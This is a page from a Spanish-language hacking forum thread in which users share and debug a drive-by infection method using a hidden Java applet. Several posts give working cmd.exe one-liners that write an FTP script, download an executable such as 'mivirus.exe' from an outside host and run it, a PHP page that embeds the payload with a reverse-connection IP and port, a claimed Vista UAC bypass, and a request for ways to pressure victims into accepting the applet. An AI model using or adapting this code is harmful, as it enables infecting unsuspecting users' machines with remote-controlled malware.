elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [POC] Infección Mediante Java Applet (y VBScript)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 Ir Abajo Respuesta Imprimir
Autor Tema: [POC] Infección Mediante Java Applet (y VBScript)  (Leído 30,808 veces)
andres52

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #30 en: 23 Abril 2009, 07:02 am »

Listo, resuelto completamente... esque el código en php esta mal.. pero lo corregi y va perfecto.
En línea

andres52

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #31 en: 25 Abril 2009, 01:10 am »

Hola, soy yo otra vez... xd

Bueno... va perfecto nadamás en mi maquina porqe trate de hacerlo funcionar en otras y aunque abre el certificado java no me abre ni me activa nada... y si por ejemplo le ponga que abra un mensaje (el de hola mundo) que pefectamente funciona en esta pc.. en cualquier otra no lo abre... no entiendo porqe!!

El host estoy usando es PHONE ACCES, que en realidad hostea en webspacemania.. no se si tarden mucho en actualizar o algo.. porfavor alguien podria explicarme porque no funciona?

Editado-- Ya se solucionó... era cosa del servidor xd
« Última modificación: 25 Abril 2009, 06:22 am por andres52 » En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #32 en: 23 Mayo 2009, 13:58 pm »

Alguien lo ha probado en win Vista?
el "Control de cuentas de usuario" creo que no deja ejecutar el bat.
 :-[

Quien logro infectar en vista?
En línea

Hackeo, luego existo...
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #33 en: 23 Mayo 2009, 16:50 pm »

Investigue un poco y el problema esta en que no deja crear el archivo  log.txt  en la carpeta windows asi que podemos poner otra ruta.

Y hay otro problema que aun no soluciono:

Código:
E:\>ftp -s:log.txt
ftp> servidor@servidor.com
Comando no v lido.
ftp> mipassword123
Comando no v lido.
ftp> cd /
Desconectado.
ftp> pwd
Desconectado.
ftp> binary
Desconectado.
ftp> get Virus.exe
Desconectado.
ftp> bye

aparece como comando no valido al tratar de conectar con el ftp....
Es por el UAC me imagino.
En línea

Hackeo, luego existo...
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #34 en: 23 Mayo 2009, 17:39 pm »

Lo pongo todo separado para que se lea mejor...
Ya conseguir que funcione en Vista y burle el UAC:

cmd.exe /c
md c:\System32 &
cd c:\system32 &
echo try@servidor>c:\\System32\log.txt&
echo mipassword>>c:\\System32\log.txt&
echo cd />>c:\\System32\log.txt&
echo pwd>>c:\\System32\log.txt&
echo binary>>c:\\System32\log.txt &
echo get mivirus.exe>>c:\\System32\log.txt&
echo bye>>c:\\System32\log.txt &
echo quit>>c:\\System32\log.txt &
ftp -s:c:\\System32\log.txt baires03.com.ar &
start mivirus.exe

asi no tocamos ninguna ruta sospechosa para el UAC y nos deja hacer todo el proceso :D
En línea

Hackeo, luego existo...
m[a]rkus

Desconectado Desconectado

Mensajes: 64


Si juegas a ser hacker piensa como un hacker.


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #35 en: 1 Junio 2009, 02:21 am »

Hola la verdad encontre información sobre este tema en otro sitios (en inglés) y me resulto muy complicado por la poca explicación que ofrecian, y buscando mas en google aparecio esto, bien lo que me sucede actualmente es lo que le ah pasado a varios aqui pero que no dicen como lo corrijieron o al menos yo no lo vi, yo tengo este codigo:
Código:
<?php
if(isset($HTTP_GET_VARS["board"])) {
$ip = $HTTP_GET_VARS["board"];
echo $ip;
}
 
else $ip = "127.0.0.1";
 
if(isset($HTTP_GET_VARS["topic"])) {
$puerto = $HTTP_GET_VARS["topic"];
echo $puerto;
}
 
else $puerto = 666;
 
echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c cd C:\\ & echo usuario@ftp.com>datos.txt&echo contraseña>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get Client.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.com&start Client.exe ".$ip." ".$puerto."&pause'>";
echo "</applet>";
 
?>

Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado.

Resuelto: Cambiar server FTP
El code esta bien
« Última modificación: 7 Junio 2009, 05:14 am por m[a]rkus » En línea

Existen dos maneras de ser feliz en esta vida, una es hacerse el idiota y la otra serlo.

andres52

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #36 en: 4 Julio 2009, 05:52 am »

Una duda, para que sirve el /c?

cmd.exe /c cd C:\...

solo por curiosidad :]
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #37 en: 4 Julio 2009, 23:24 pm »

Código
  1. C:\Documents and Settings\Novlucker>cmd /?
  2. Inicia una nueva instancia del intérprete de comandos de Windows XP
  3.  
  4. CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
  5. [[/S] [/C | /K] cadena]
  6.  
  7. /C Ejecuta el comando especificado en cadena y luego finaliza

Ejecuta todos los comandos que vienen después

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
andres52

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #38 en: 12 Julio 2009, 05:11 am »

Muchas gracias por tu respuesta Novlucker.

Ahora lo que quiero es borrar la carpeta creada aqui:
Citar
Lo pongo todo separado para que se lea mejor...
Ya conseguir que funcione en Vista y burle el UAC:

cmd.exe /c
md c:\System32 &
cd c:\system32 &
echo try@servidor>c:\\System32\log.txt&
echo mipassword>>c:\\System32\log.txt&
echo cd />>c:\\System32\log.txt&
echo pwd>>c:\\System32\log.txt&
echo binary>>c:\\System32\log.txt &
echo get mivirus.exe>>c:\\System32\log.txt&
echo bye>>c:\\System32\log.txt &
echo quit>>c:\\System32\log.txt &
ftp -s:c:\\System32\log.txt baires03.com.ar &
start mivirus.exe

le pongo &cd..&rd system32 /s /q y no funciona.. no la borra.. pero poniendo ese código directamente en la consola si la borra... porque?

Edit- Ya vi porque no la borra... tiene el exe activado todavia.. bueno no es de mucha importancia, pues si ya la persona esta infectada puedo borrar la carpeta manualmente Pero ahora el problema es otro, cuando el usuario es limitado y tiene el uac activado, no funciona el código, no tengo idea porque pero no crea la carpeta ni activa nada... aún cuando en el cmd si puedo hacerlo manualmente (y aún cuando ya probé sin el uac activado y si funcionaba) ¿Porque ocurre esto?
« Última modificación: 12 Julio 2009, 05:46 am por andres52 » En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #39 en: 15 Julio 2009, 03:26 am »

me tiene bien satisfecho este metodo de infección pero no del todo no falta el que por desesperado le pique a cancelar porque penso que era publicidad o alguna otra cosa.
Se les ocurre algo que oriente o casi obligue al usuario a darle click a Aceptar?
:/
En línea

Hackeo, luego existo...
Páginas: 1 2 3 [4] 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Infeccion de dispositivos USBs mediante archivos LNK
Análisis y Diseño de Malware
Jaixon Jax 4 6,972 Último mensaje 1 Diciembre 2010, 02:25 am
por Stelio Kontos
Ejemplo de infección mediante TLS Callbacks
Análisis y Diseño de Malware
The Swash 0 2,321 Último mensaje 16 Mayo 2011, 02:16 am
por The Swash
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines